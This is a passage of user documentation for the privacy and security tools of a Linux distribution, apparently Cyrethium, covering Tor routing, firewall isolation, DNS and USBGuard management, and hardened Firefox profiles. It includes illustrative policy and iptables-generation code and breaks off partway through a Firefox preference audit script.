18. Wallet Description: Set and show wallet description

19. Make Donation For Monero: Donate to Monero project

20. Show Version: Shows Monero wallet version

Network Selection

Mainnet: Main Monero network

Stagenet: Test network (mainnet-like)

Testnet: Developer test network

Monero Privacy Features

Ring Signatures: Each transaction mixed with other transactions (typical 11 decoys)

Stealth Addresses: New address created for each transaction

RingCT: Transaction amounts hidden

Dandelion++: Transaction propagation hidden

FAQ

Q: Why is Monero private? A: Uses ring signatures, stealth addresses and RingCT technologies.

Q: Transaction fee? A: Dynamic, usually very low (0.0001-0.001 XMR).

Q: What is subaddress? A: Additional addresses derived from primary address. Used for privacy.

Q: What is integrated address? A: Addresses containing payment ID. Used for payment tracking.

Q: How is it different from Bitcoin? A: Monero is private by default; Bitcoin is not.

Security Warnings

1. Seed Phrase Critical: Lose it, lose your wallet

2. Tor Mandatory: IP leak breaks privacy

3. Phishing: Beware of fake wallet sites

4. Malware: Download from trusted sources

Paranoia - Complete Network Isolation

Paranoia is an emergency tool that completely isolates the system from all external connections. Blocks all network traffic and maximizes system security.

Usage

sudo paranoia

Main Menu

1. Enable Paranoia Mode: Backs up firewall rules → Blocks all traffic (INPUT/OUTPUT/FORWARD → DROP) → Removes WiFi/Bluetooth modules → Stops network services

2. Disable Paranoia Mode: Clears firewall rules → Sets policies to ACCEPT → Removes module blacklists → Restarts network services

Security Notes

WARNINGS:

1. Tor Usage: Stop Tor before enabling Paranoia mode!

2. Data Loss: Open network connections will be cut

3. Remote Access: SSH/RDP connections will drop

Tor Conflict

WHY STOP TOR? Paranoia mode blocks all network traffic. As a result the Tor connection is cut, the anonymous IP may leak, and the system becomes unstable.

Tips

Emergency Only: Use only in real threat situations

SecDNS Changer - Secure DNS Changer

SecDNSChanger is a PyQt5-based tool that easily changes system DNS settings. Choose from 8 different secure DNS providers.

Usage

secdnschanger

DNS Providers

1. Cloudflare (1.1.1.1): Primary 1.1.1.1, Secondary 1.0.0.1 - Fastest DNS, privacy-focused, DNSSEC support

2. OpenDNS (208.67.222.222): Primary 208.67.222.222, Secondary 208.67.220.220

3. Quad9 (9.9.9.9): Primary 9.9.9.9, Secondary 149.112.112.112

4. AdGuard (94.140.14.14): Primary 94.140.14.14, Secondary 94.140.15.15

5. Yandex (77.88.8.8): Primary 77.88.8.8, Secondary 77.88.8.1

6. CleanBrowsing (185.228.168.9): Primary 185.228.168.9, Secondary 185.228.169.9

7. Comodo Secure (8.26.56.26): Primary 8.26.56.26, Secondary 8.20.247.20

8. Google (8.8.8.8): Primary 8.8.8.8, Secondary 8.8.4.4

Important

Changing DNS requires root. If you are using Tor, DNS is already resolved anonymously.

Tips

Privacy: Prefer Cloudflare or Quad9

Ad Blocking: Use AdGuard

Curl-Wget Agent Spoofer - HTTP Request Anonymizer

Curl-Wget Agent Spoofer is a tool that changes user agent strings to anonymize your HTTP requests. Hides your browser and system information with 100+ different user agents.

Usage

curl-wget-agentspoofer

Main Menu

1. Execute CURL with Spoofed User Agent: Makes requests with curl using spoofed user agent

Options: Random user agent, Select from list, Custom user agent

Curl Modes: Basic request, Follow redirects (-L), Include headers (-I), Silent mode (-s), Verbose mode (-v), Custom options

2. Execute WGET with Spoofed User Agent: Downloads with wget using spoofed user agent

Options: Random user agent, Select from list, Custom user agent

Wget Modes: Basic download, Continue partial (-c), Background (-b), Quiet mode (-q), Verbose mode (-v), Custom options

3. Show Available User Agents: Lists all available user agents

4. Show Help: Shows help and documentation

Security Notes

Important: User agent spoofing is only basic anonymization. Use it together with Tor, and keep in mind that some sites use other fingerprinting methods.

TorPortal CLI - Tor Network Monitoring Tool

TorPortal CLI is an advanced Python-based CLI tool for monitoring Tor network traffic, viewing circuit information, and analyzing security status.

Usage

sudo torportal-cli

Root recommended (for some features)

Main Menu

1. Status Overview: Tor status and general information (Tor status RUNNING/NOT RUNNING, Traffic status Via Tor/Direct, Public IP, Active port count, Circuit node count, Tor process count, Network traffic sent/received)

2. Connection Details: Active Tor connections and port details. For each connection: Port number, Protocol (TCP/UDP), Status (LISTENING, ESTABLISHED, etc.), Local address, Remote address, Detection method (netstat, psutil, port_scan)

Port Descriptions: 9050 SOCKS5 Proxy, 9051 Control Port, 9040 Transparent Proxy, 8118 Privoxy HTTP Proxy, 8080 Alternative HTTP Proxy, 9001 ORPort (Relay), 9030 DirPort (Directory)

3. Tor Circuit Info: Tor circuit and node details (requires stem). Circuit ID, Node type (Guard/Middle/Exit), Nickname, IP address, Country, Fingerprint, Bandwidth, Flags

4. Network Statistics: Detailed network statistics. General traffic (Sent/received bytes, Sent/received packets, Error count in/out, Drop count in/out), Tor connections (Total Tor connection count, Connection states ESTABLISHED/TIME_WAIT), Active interfaces (Interface name, Byte/packet statistics)

5. Security Status: Security status and anonymity check

SECURE (Green): Tor running, Traffic via Tor, IP anonymized

PARTIALLY SECURE (Yellow): Tor running, Traffic NOT via Tor, Configuration error

INSECURE (Red): Tor not running, Direct traffic, IP exposed

Recommendations: If Tor not running - Start Tor, If traffic not routed - Set SOCKS5 proxy (127.0.0.1:9050), If secure - All checks passed

6. Performance Monitor: System and Tor performance data. System (CPU usage %, CPU core count, CPU frequency MHz, RAM usage %, Total/used/available RAM, Disk usage %, Total/free disk, System uptime), Tor (Tor CPU usage %, Tor RAM usage %), Network (Total sent/received). Performance rating: Excellent (CPU < 30%, RAM < 50%), Normal (CPU < 60%, RAM < 70%), High (CPU/RAM high)

7. Tor Configuration: Tor configuration information. Basic config (Control Port, SOCKS Port, Data Directory, Exit Policy, Config File path), Detected ports (Port number, Type SOCKS/Control, Status Active/Inactive). Recommendations: If control port not detected add ControlPort 9051, If SOCKS port not detected check Tor service

8. Continuous Monitor: Real-time continuous monitoring mode

9. Full Report: Summary report of all sections

d. Debug Mode: Toggle debug mode (Detailed error messages, Connection attempts, Detection methods, Debug info)

r. Refresh: Recollect all data

q. Quit: Exit program

USBGuard Manager - USB Device Security Manager

USBGuard Manager is a security tool that controls USB devices and blocks unauthorized USB access. Provides whitelist/blacklist based USB management.

Usage

cyrethium-usbguard

Main Menu

1-2. Installation: 1. Install USBGuard package, 2. Install usbutils (lsusb)

3-8. Service Management:

3. Enable USBGuard service (enables auto-start; does not start the service now)

4. Disable USBGuard service (disable auto-start)

5. Start USBGuard service

6. Stop USBGuard service

7. Restart USBGuard service

8. Service status

9-11. Device Listing:

9. List USB devices (lsusb) - All USB devices

10. List USB devices (usb-devices) - Detailed USB info

11. List blocked USB devices

12-13. Device Permissions:

12. Temporarily allow USB device (lost on reboot)

13. Permanently allow USB device (added to policy)

14-17. Policy Management:

14. Generate USBGuard policy (create from current devices, default deny)

15. Show current USBGuard policy

16. Backup current USBGuard policy

17. Restore USBGuard policy from backup

18-19. Configuration:

18. Toggle default policy (Allow all ↔ Deny all)

19. Edit USBGuard rules.conf

20. USBGuard Rules Guide: Detailed configuration guide

Policy Options

ImplicitPolicyTarget: allow (allow unknown devices), block (block unknown devices), reject (remove device from system)

PresentDevicePolicy: allow (allow present devices), block (block present devices), keep (keep current state), apply-policy (apply policy)

InsertedDevicePolicy: block (block new devices), reject (reject new devices), apply-policy (apply policy)

Security Notes

Important:

1. Keyboard/Mouse: Add them to the whitelist on first setup

2. Backup: Back up before policy changes

3. Test: Test critical devices

Tips

1. Vendor ID - Allow all devices from same manufacturer: allow id 1234:*

2. Serial Number - Specific device: allow id 1234:5678 serial "ABC123"

3. Port - Specific USB port: allow via-port "1-2"
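
The policy generation of menu item 14 and the three rule forms above, as an added example written for this page (not the cyrethium-usbguard source; usbguard's own `generate-policy` subcommand does the same from the live bus). The device inventory is constructed. The rule order is the point: input devices come first so the console never loses its keyboard, vendor wildcards next, then individually pinned devices, and a final `block` as the catch-all. The more attributes a rule matches (id, serial, name, interface descriptors, port), the harder a device is to impersonate.

```python
"""Added example: build a default-deny USBGuard rules file from a device
inventory, as the "Generate USBGuard policy" item and the tips above describe.
Illustrative code written for this page, not the cyrethium-usbguard source;
the device list is constructed."""
import re

ID_RE = re.compile(r"^[0-9a-f]{4}:(?:[0-9a-f]{4}|\*)$")
HID_CLASS = "03"  # USB interface class of keyboards and mice

# Constructed inventory: vendor:product id, serial, product name, interface descriptors, port
DEVICES = [
    {"id": "046d:c31c", "serial": "", "name": "USB Keyboard",
     "interfaces": ["03:01:01", "03:00:00"], "port": "1-2"},
    {"id": "0951:1666", "serial": "ABC123", "name": "DataTraveler",
     "interfaces": ["08:06:50"], "port": "1-4"},
    {"id": "1234:5678", "serial": "", "name": "Unknown Gadget",
     "interfaces": ["ff:00:00"], "port": "2-1"},
]


def quote(value: str) -> str:
    """Double-quoted string literal as USBGuard's rule language expects."""
    return '"' + value.replace("\\", "\\\\").replace('"', '\\"') + '"'


def is_hid(dev: dict) -> bool:
    return any(i.startswith(HID_CLASS + ":") for i in dev["interfaces"])


def rule_for(dev: dict, pin_port: bool = False) -> str:
    """One 'allow' rule; the more attributes matched, the harder to impersonate."""
    if not ID_RE.match(dev["id"]):
        raise ValueError(f"bad USB id {dev['id']!r}")
    parts = ["allow", "id", dev["id"]]
    if dev["serial"]:
        parts += ["serial", quote(dev["serial"])]      # tip 2: pin a specific unit
    parts += ["name", quote(dev["name"])]
    if dev["interfaces"]:
        parts += ["with-interface", "{ " + " ".join(dev["interfaces"]) + " }"]
    if pin_port:
        parts += ["via-port", quote(dev["port"])]      # tip 3: only on this physical port
    return " ".join(parts)


def generate_rules(devices: list[dict], vendor_wildcards: tuple[str, ...] = (),
                   pin_hid_to_port: bool = True) -> str:
    """Input devices first (so the console keeps its keyboard), then vendor
    wildcards (tip 1), then the remaining known devices, then a final 'block'."""
    for vendor in vendor_wildcards:
        if not ID_RE.match(f"{vendor}:*"):
            raise ValueError(f"bad vendor id {vendor!r}")

    def covered(dev: dict) -> bool:
        return any(dev["id"].startswith(v + ":") for v in vendor_wildcards)

    hid = [d for d in devices if is_hid(d)]
    rest = [d for d in devices if not is_hid(d) and not covered(d)]
    lines = ["# Generated default-deny policy; review before installing as rules.conf"]
    lines += [rule_for(d, pin_port=pin_hid_to_port) for d in hid]
    lines += [f"allow id {v}:*" for v in vendor_wildcards]
    lines += [rule_for(d) for d in rest]
    lines.append("block")   # catch-all; same effect as ImplicitPolicyTarget=block
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(generate_rules(DEVICES, vendor_wildcards=("0951",)), end="")
```

A vendor wildcard such as `allow id 0951:*` is convenient but trusts every product that vendor id claims to be, so prefer serial-pinned rules for storage devices and keep the wildcard for input peripherals you actually swap.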

Cyrethonion - System-Wide Tor Routing Tool

Cyrethonion is a powerful tool that routes all system traffic through the Tor network. Uses transparent proxy to automatically pass all your internet connections through Tor and provides maximum privacy.

Developer: root0emir | Version: 2.0 Hardened | License: GNU GPL v3.0

Security Features

System-Wide Tor Routing: All TCP traffic automatically routed through Tor

DNS Leak Protection: All DNS queries forced through Tor DNS (port 9053)

IPv6 Disabled: Completely blocks IPv6 data leaks

UDP Traffic Blocking: UDP traffic is automatically dropped (Tor does not carry UDP)

ICMP Privacy Mode: No response to ping requests (stealth mode)

Application Isolation: Each application and website completely isolated

Cyrethonion Tor Guard: Automatically detects suspicious environment variables

Advanced Protection Mechanisms

BAD_FLAGS Attack Protection: NULL Scan, XMAS Scan, SYN+FIN attack, SYN+RST attack, RST Flood protection (max 2 packets/sec), Active on both INPUT and OUTPUT chains

Anti-Spoofing Protection: Loopback spoofing (127.0.0.0/8), Invalid source (0.0.0.0/8), Multicast spoofing (224.0.0.0/4), Reserved space (240.0.0.0/4)

Bridge Support

Obfs4 Bridge Support: To bypass Tor blocking, Bridge add/list/clear, Automatic bridge configuration, Multiple bridge support

System Tray Application (cyrethonion-mate)

Start Tor Routing: Starts system-wide Tor routing. All internet traffic routed through Tor network

Stop Tor Routing: Stops Tor routing and returns to normal internet connection

Change IP Address: Gets new IP by changing Tor exit node. Only works when Tor routing active

Show IP Address: Checks current IP and verifies traffic routed through Tor

Status: Shows Tor service status and routing info

Restart Router: Restarts Tor router service. Useful for connection issues

Add Bridges: Adds bridges to bypass Tor blocking. Only Obfs4 bridges supported

List Bridges: Shows configured bridges

Clear Bridges: Removes all configured bridges and returns to normal Tor entry nodes

Status Icons

Green Icon (ACTIVE): Tor routing active | Red Icon (DISABLED): Tor routing disabled | Yellow Icon (TIMEOUT): Connection timeout | Orange Icon (IP CHANGING): IP address changing | Gray Icon (OFFLINE): No internet connection

Command Line Usage

# Start Tor routing
sudo cyrethonion start

# Stop Tor routing
sudo cyrethonion stop

# Status check
sudo cyrethonion status

# Restart Tor router
sudo cyrethonion restart

# Change IP address
sudo cyrethonion changeid

# Check IP address
cyrethonion ip

# Bridge management
sudo cyrethonion bridges
cyrethonion list-bridges
sudo cyrethonion clear-bridges

# Version info
cyrethonion version

Technical Details - Network Configuration

Tor Ports: TransPort 9040 (Transparent Proxy), SocksPort 9050 (SOCKS Proxy), DNSPort 9053 (DNS), ControlPort 9051 (Control)

Excluded Networks: 127.0.0.0/8, 10.0.0.0/8, 100.64.0.0/10, 169.254.0.0/16, 172.16.0.0/12, 192.0.0.0/24, 192.0.2.0/24, 192.168.0.0/16, 198.18.0.0/15, 198.51.100.0/24, 203.0.113.0/24, 224.0.0.0/4, 240.0.0.0/4

IPTables Rules

NAT Table: Skip Tor user traffic, Redirect ALL DNS traffic to Tor DNS, Block UDP traffic (Tor does not carry UDP), Redirect TCP traffic to Tor

Filter Table: Create BAD_FLAGS chains, Route INPUT/OUTPUT packets to BAD_FLAGS chain, Anti-spoofing rules, ICMP blocking (stealth mode), REJECT all non-Tor traffic
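
The two tables above, rendered as an iptables-restore ruleset. This is an added example written for this page, not Cyrethonion's own script: the ports and excluded networks are the ones listed in the Technical Details, the Tor service user name (`debian-tor`) is an assumption, and the UDP drop is placed in the filter table rather than the nat table. The ordering check at the end is the caveat a practitioner wants: every RETURN exception in the nat OUTPUT chain (the Tor user, loopback, the excluded networks) must precede the catch-all REDIRECT to the TransPort, or Tor's own connections would be redirected back into Tor.

```python
"""Added example: render an iptables-restore ruleset of the shape described
in the IPTables Rules section (DNS and TCP redirected to Tor, UDP dropped,
BAD_FLAGS chain, anti-spoofing, ICMP silenced). Illustrative code written
for this page, not Cyrethonion's own script. Ports and excluded networks are
the ones listed above; the Tor user name is an assumption, and the UDP drop
sits in the filter table rather than the nat table."""
import subprocess

TRANS_PORT, DNS_PORT = 9040, 9053
EXCLUDED = [
    "127.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "169.254.0.0/16", "172.16.0.0/12",
    "192.0.0.0/24", "192.0.2.0/24", "192.168.0.0/16", "198.18.0.0/15",
    "198.51.100.0/24", "203.0.113.0/24", "224.0.0.0/4", "240.0.0.0/4",
]
SPOOFED_SOURCES = ["127.0.0.0/8", "0.0.0.0/8", "224.0.0.0/4", "240.0.0.0/4"]


def nat_rules(tor_user: str) -> list[str]:
    """nat OUTPUT: Tor's own sockets and local nets pass untouched, DNS goes to
    DNSPort, every other new TCP connection goes to TransPort. Order matters:
    the RETURN rules must precede the catch-all REDIRECT."""
    rules = ["*nat", ":PREROUTING ACCEPT [0:0]", ":INPUT ACCEPT [0:0]",
             ":OUTPUT ACCEPT [0:0]", ":POSTROUTING ACCEPT [0:0]",
             f"-A OUTPUT -m owner --uid-owner {tor_user} -j RETURN",
             "-A OUTPUT -o lo -j RETURN",
             f"-A OUTPUT -p udp --dport 53 -j REDIRECT --to-ports {DNS_PORT}",
             f"-A OUTPUT -p tcp --dport 53 -j REDIRECT --to-ports {DNS_PORT}"]
    rules += [f"-A OUTPUT -d {net} -j RETURN" for net in EXCLUDED]
    rules += [f"-A OUTPUT -p tcp --syn -j REDIRECT --to-ports {TRANS_PORT}", "COMMIT"]
    return rules


def filter_rules(tor_user: str) -> list[str]:
    """filter: default DROP, malformed-flag and spoofed packets dropped, only
    Tor (and the excluded local nets) may leave, everything else is rejected."""
    rules = ["*filter", ":INPUT DROP [0:0]", ":FORWARD DROP [0:0]",
             ":OUTPUT DROP [0:0]", ":BAD_FLAGS - [0:0]",
             "-A BAD_FLAGS -p tcp --tcp-flags ALL NONE -j DROP",            # NULL scan
             "-A BAD_FLAGS -p tcp --tcp-flags ALL FIN,PSH,URG -j DROP",     # XMAS scan
             "-A BAD_FLAGS -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP",
             "-A BAD_FLAGS -p tcp --tcp-flags SYN,RST SYN,RST -j DROP",
             "-A BAD_FLAGS -p tcp --tcp-flags RST RST -m limit --limit 2/second --limit-burst 2 -j RETURN",
             "-A BAD_FLAGS -p tcp --tcp-flags RST RST -j DROP",            # RST flood above 2/s
             "-A INPUT -j BAD_FLAGS", "-A OUTPUT -j BAD_FLAGS"]
    rules += [f"-A INPUT -s {src} ! -i lo -j DROP" for src in SPOOFED_SOURCES]
    rules += ["-A INPUT -i lo -j ACCEPT",
              "-A INPUT -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT",
              "-A INPUT -p icmp -j DROP",                                # stealth: no ping replies
              "-A OUTPUT -o lo -j ACCEPT",                               # redirected flows now target lo
              f"-A OUTPUT -m owner --uid-owner {tor_user} -j ACCEPT"]
    rules += [f"-A OUTPUT -d {net} -j ACCEPT" for net in EXCLUDED]
    rules += ["-A OUTPUT -p udp -j DROP",                                # Tor carries TCP only
              "-A OUTPUT -j REJECT --reject-with icmp-port-unreachable", "COMMIT"]
    return rules


def render_ruleset(tor_user: str = "debian-tor") -> str:
    return "\n".join(nat_rules(tor_user) + filter_rules(tor_user)) + "\n"


def ordering_ok(rules: list[str]) -> bool:
    """Sanity check: no nat OUTPUT RETURN exception may sit below the TransPort
    REDIRECT, or Tor's own traffic would be looped back into Tor."""
    redirect = next(i for i, r in enumerate(rules) if f"--to-ports {TRANS_PORT}" in r)
    exceptions = [i for i, r in enumerate(rules)
                  if r.startswith("-A OUTPUT") and r.endswith("-j RETURN")]
    return all(i < redirect for i in exceptions)


def apply_ruleset(text: str, backup_path: str = "/var/backups/iptables.before-tor") -> None:
    """Back up the live rules first (as the Backup System below does), then load ours."""
    with open(backup_path, "wb") as fh:
        fh.write(subprocess.run(["iptables-save"], check=True, capture_output=True).stdout)
    subprocess.run(["iptables-restore"], input=text.encode(), check=True)


if __name__ == "__main__":
    print(render_ruleset(), end="")
```

Review the rendered text before loading it with `apply_ruleset`, which needs root; the saved `iptables-save` output is what `iptables-restore` takes back to undo the change, matching the restore-on-stop behaviour described under Backup System.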

Sysctl Configuration

Completely disables IPv6: net.ipv6.conf.all.disable_ipv6 = 1, net.ipv6.conf.default.disable_ipv6 = 1, net.ipv6.conf.lo.disable_ipv6 = 1

Tor Configuration (torrc)

Isolation settings: TransPort/SocksPort with IsolateClientAddr, IsolateSOCKSAuth, IsolateClientProtocol, IsolateDestPort, IsolateDestAddr

Performance and security: HardwareAccel 1, ClientUseIPv6 0, CookieAuthentication 1

Circuit management: NewCircuitPeriod 40, MaxCircuitDirtiness 600, MaxClientCircuitsPending 48, UseEntryGuards 1

Backup System

Cyrethonion automatically backs up: /etc/tor/torrc, /etc/resolv.conf, IPTables rules, Sysctl settings. All settings automatically restored when service stopped.

Troubleshooting

Internet Connection Lost: Click "Restart Router" or "Stop Tor Routing" then "Start Tor Routing", Try system reboot

Bridge Connection Failed: Clear current bridges and add new ones, Paste bridges as-is without spaces or changes, Restart Cyrethonion after adding bridges, Get new bridges from https://bridges.torproject.org/

Slow Connection: Click "Change IP Address" for faster exit node, Restart router for new circuit, This is normal behavior for Tor network

Can't Change IP: Ensure Tor routing started first, Wait few seconds and try again, Restart Tor router if problem persists

tor@default.service Error: Not a critical error, Tor@default.service will auto-restart, Failure at boot doesn't affect actual operation, Routing and Tor process continue working normally

Start Button Not Working: Reboot system, Ensure no other VPN running

IP Check Shows Real IP: Stop and restart Tor routing, Check if some apps bypassing Tor, Restart browser

DNS Change Warning: NO! Don't change DNS while using Cyrethonion, Changing DNS can cause DNS leaks, Cyrethonion uses Tor DNS during routing, Your current DNS backed up before routing starts, Automatically restored when routing stopped

Important Warnings - CRITICAL LIMITATIONS

UDP Traffic Not Anonymized: Cyrethonion automatically drops UDP traffic, Tor only supports TCP connections, UDP packets not routed through Tor

VoIP Applications Risk: Voice calls (Skype, Discord, WhatsApp calls), Video calls (Zoom, Teams, Google Meet), These apps use UDP and may not work. Recommendation: Disable or don't use during Tor sessions

Online Games Risk: Most online games use UDP for performance, Multiplayer games may not work. Recommendation: Only play offline games

WebRTC Leak Risk: Web browsers can leak real IP through WebRTC, Video chat websites may bypass Tor. Solution: Use Hardened/Amnesic Firefox instead of normal browsers, Disable WebRTC in browser settings

DNS Leak Prevention: Some apps may use custom DNS servers, May bypass Tor's DNS routing. Recommendation: Regularly check for DNS leaks

Performance Impact

Tor routing adds significant latency and download speeds will be much slower. This is normal and necessary for anonymity; patience is required for browsing.

Don't Use with Tor Browser

Tor Browser is not compatible with Cyrethonion because it uses its own Tor instance. Use Hardened/Amnesic Firefox instead.

Best Practices

1. Browser: Use Hardened/Amnesic Firefox for web browsing

2. Accounts: Avoid logging into personal accounts

3. Files: Don't download/upload large files

4. Info: Never provide personal information

5. Extensions: Disable extensions and JavaScript when possible

6. Check: Regularly check your IP address

Application-Specific Notes

Browsers: Use Hardened/Amnesic Firefox for maximum security | Email: Use web-based email through Hardened/Amnesic Firefox | Streaming: May not work or be very slow

Security Measures Summary

Cyrethonion Tor Guard: Automatically detects and warns about suspicious environment variables (Library hijacking attacks, Code injection attempts, Privilege escalation attacks, Malware persistence)

Application & Website Isolation: Each application and website completely isolated. IsolateClientAddr (different circuits for different client addresses), IsolateSOCKSAuth (separate circuits for different authentication), IsolateClientProtocol (protocol-based isolation), IsolateDestPort (destination port isolation), IsolateDestAddr (destination address isolation)

Circuit Management: NewCircuitPeriod 40 seconds for new circuits, MaxCircuitDirtiness 600 seconds max circuit usage, UseEntryGuards consistent entry points, EnforceDistinctSubnets different subnets for diversity, MaxClientCircuitsPending 48 circuits for performance

Safe Restart Mechanism: Complete process termination, Port release verification (9040, 9050, 9051, 9053), Clean state restoration, Prevents resource conflicts

FAQ

Q: Can Cyrethonion be used with VPN? A: No, not recommended with VPN. Can cause conflicts.

Q: Do all apps work through Tor? A: Apps using TCP work. Apps using UDP (games, VoIP) don't work.

Q: When to use bridges? A: In countries or networks where Tor is blocked.

Q: How long does IP change take? A: Usually 5-10 seconds.

Q: Does Cyrethonion use much system resources? A: No, uses minimal system resources. Tor service is lightweight.

License and Disclaimer

Cyrethonion licensed under GNU General Public License v3.0. Disclaimer: This tool should only be used for legal and ethical purposes. Developers not responsible for misuse of the tool.

Developer: root0emir | Website: https://cyrethium.org | GitHub: https://github.com/Cyrethium/

About Hardened Firefox

Hardened Firefox is Cyrethium's daily-use browser configuration, optimized for security and privacy while maintaining usability. Security Score: 9.2/10

Design Philosophy

Motto: "Secure but usable"

Balanced for daily web browsing, social media, email, and development work on personal computers.

Core Security Features

Telemetry Protection (10/10)

All Mozilla telemetry completely disabled. No data sent to Mozilla or third parties.

Fingerprinting Protection (9/10)

Resist Fingerprinting (RFP) enabled with standardized browser characteristics:

  • Timezone spoofing (UTC)
  • User agent normalization
  • Canvas fingerprinting protection
  • WebGL enabled but protected by RFP
  • Letterboxing disabled for full-screen usability

Tracking Protection (10/10)

  • Strict tracking protection mode
  • Total Cookie Protection (TCP)
  • Third-party cookie blocking
  • Social media trackers blocked

HTTPS/TLS Security (10/10)

  • HTTPS-Only Mode enabled
  • TLS 1.2+ required (minimum)
  • TLS 1.3 preferred
  • OCSP must-staple enabled
  • Insecure ciphers disabled

WebRTC Protection (8/10)

  • WebRTC enabled for functionality
  • Local IP hidden (no_host)
  • Default address only mode
  • Proxy-only when behind proxy
  • relay_only disabled (better connection quality)

Cookie Management (8/10)

  • Total Cookie Protection enabled
  • Cookies are persistent (for usability)
  • Third-party cookies blocked
  • SameSite=Lax default

Cache Management (7/10)

  • Disk cache enabled (1GB) for performance
  • Memory cache enabled
  • Cache cleared on shutdown

Network Security

  • DNS prefetch disabled
  • Link prefetch disabled
  • Speculative connections disabled
  • DoH (DNS over HTTPS) disabled (use system DNS)
  • Network partitioning enabled

JavaScript Security (7/10)

  • JIT enabled (for performance)
  • WebAssembly enabled
  • Baseline JIT enabled
  • Ion JIT enabled

Disabled Features

  • Pocket integration
  • Firefox Sync
  • Password manager
  • Safe Browsing (privacy concern)
  • Normandy experiments
  • Studies and recommendations

Ideal Use Cases

  • Daily web browsing on personal computer
  • Social media and email
  • Online shopping
  • Web development (DevTools available)

Amnesic Firefox

Amnesic Firefox is Cyrethium's ultra-secure browser configuration designed for maximum privacy with session-based usage. Security Score: 9.8/10

Design Philosophy

Motto: "Leave no trace"

Core Principle: Every session ends with complete data wipe. The browser starts fresh each time, leaving zero forensic traces.

What "Amnesic" Means

  • All data deleted on close
  • No session information stored
  • Disk cache disabled (RAM only)
  • No history, bookmarks, or downloads saved
  • Browser resets to "zero state" on every launch

Key Differences from Hardened Firefox

Critical Security Enhancements

Feature            | Hardened       | Amnesic      | Impact
Letterboxing       | Disabled       | Enabled      | Screen resolution fingerprinting blocked
WebGL              | Enabled        | Disabled     | GPU fingerprinting completely blocked
WebRTC relay_only  | Disabled       | Enabled      | IP leak risk eliminated
Disk Cache         | Enabled (1GB)  | Disabled     | No data written to disk
Cookies            | Persistent     | Session-only | Deleted on close
History            | Saved          | Disabled     | No browsing history recorded
WebAssembly        | Enabled        | Disabled     | WASM attacks prevented
Document Fonts     | Enabled        | Disabled     | Font fingerprinting blocked
DevTools           | Enabled        | Disabled     | Reduced attack surface

Shutdown Cleanup

On browser close, everything is wiped:

  • Cache (disk and memory)
  • Cookies and site data
  • Browsing history
  • Download history
  • Form data
  • Active sessions
  • Site settings and permissions
  • Offline app data

Security Score Breakdown

  • Telemetry Protection: 10/10
  • Fingerprinting Protection: 10/10 (Letterboxing + WebGL disabled)
  • Tracking Protection: 10/10
  • TLS/HTTPS Security: 10/10
  • Cookie Management: 10/10 (Session-only)
  • Cache Management: 10/10 (Disk cache disabled)
  • WebRTC Security: 10/10 (relay_only enabled)
  • JavaScript Security: 8/10 (JIT enabled for performance, WASM disabled)
  • Network Isolation: 10/10

Performance Trade-offs

  • Speed: Slower than Hardened (no disk cache, downloads everything each time)
  • RAM Usage: Higher (512MB memory cache vs disk cache)
  • Bandwidth: Higher consumption (no caching between sessions)
  • Site Compatibility: ~70% (WebGL, WASM, web fonts disabled)

Ideal Use Cases

  • Public computers (internet cafes, libraries, hotels)
  • Shared devices
  • Sensitive one-time operations
  • Whistleblowing and activism
  • Maximum privacy scenarios

Not Recommended For

  • Daily browsing (requires login every time)
  • Web development (DevTools disabled)
  • Media consumption (slow without cache)
  • Long-term projects (no history or session restore)

Comparison with Tor Browser

Similarities: Letterboxing, WebGL disabled, WASM disabled, session-only cookies, no history

Key Difference: Tor Browser has JIT disabled (more secure but slower). Amnesic has JIT enabled (faster but slightly less secure). Tor Browser includes built-in Tor routing; Amnesic requires manual Tor/VPN configuration.

Recommended Strategy

Dual Browser Approach:

  • Primary: Hardened Firefox for daily use
  • Special Tasks: Amnesic Firefox for sensitive operations

Hardened vs Amnesic Firefox

Quick Comparison

Aspect           | Hardened               | Amnesic
Security Score   | 9.2/10                 | 9.8/10
Usability        | 9/10                   | 6/10
Performance      | 8/10                   | 6/10
Data Persistence | Yes (logins saved)     | No (wiped on close)
Ideal For        | Daily use, personal PC | Public PC, sensitive tasks

When to Use Each

Use Hardened Firefox When:

  • Using your personal computer
  • Daily web browsing, social media, email
  • You want logins and settings saved
  • Performance and speed matter
  • Web development (DevTools needed)

Use Amnesic Firefox When:

  • Using public or shared computers
  • Performing sensitive one-time operations
  • Maximum privacy required
  • No forensic traces should remain
  • Whistleblowing or activism

Key Technical Differences

Amnesic adds these protections:

  • Letterboxing (screen resolution fingerprinting blocked)
  • WebGL disabled (GPU fingerprinting blocked)
  • WebRTC relay_only (IP leak eliminated)
  • Disk cache disabled (no data written to disk)
  • Session-only cookies (deleted on close)
  • History disabled (no browsing history)
  • WebAssembly disabled (WASM attacks prevented)
  • Document fonts disabled (font fingerprinting blocked)
  • DevTools disabled (reduced attack surface)
  • Complete shutdown cleanup (everything wiped)
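The two feature lists above (Hardened's core settings and the protections Amnesic adds) map onto Firefox about:config keys. The script below is an added example, not one of Cyrethium's own configuration files: it renders either profile's settings as a user.js and audits an existing user.js against them, printing every pref that deviates. The pref names are real Firefox keys and the expected values follow this page's lists; the profile labels "hardened" and "amnesic", the script name and the file layout are assumptions.

```shell
#!/bin/sh
# Added example (not Cyrethium's own code): render the Hardened and Amnesic
# settings listed on this page as a Firefox user.js, and audit an existing
# user.js against them. Pref names are real about:config keys; the values
# follow the feature lists above; the profile labels are assumptions.

# Prefs shared by both profiles: telemetry off, RFP, strict tracking
# protection with Total Cookie Protection, HTTPS-only, TLS 1.2 minimum,
# OCSP must-staple, WebRTC no_host/default_address_only, prefetching off,
# DoH off (system DNS), network partitioning, and the disabled features.
common_policy() {
cat <<'EOF'
toolkit.telemetry.enabled false
datareporting.healthreport.uploadEnabled false
privacy.resistFingerprinting true
browser.contentblocking.category "strict"
network.cookie.cookieBehavior 5
dom.security.https_only_mode true
security.tls.version.min 3
security.ssl.enable_ocsp_must_staple true
media.peerconnection.ice.no_host true
media.peerconnection.ice.default_address_only true
network.dns.disablePrefetch true
network.prefetch-next false
network.http.speculative-parallel-limit 0
network.trr.mode 5
privacy.partition.network_state true
extensions.pocket.enabled false
identity.fxaccounts.enabled false
signon.rememberSignons false
app.normandy.enabled false
EOF
}

# Prefs that differ between the profiles ("Key Technical Differences").
profile_policy() {
    case $1 in
    hardened) cat <<'EOF'
privacy.resistFingerprinting.letterboxing false
webgl.disabled false
media.peerconnection.ice.relay_only false
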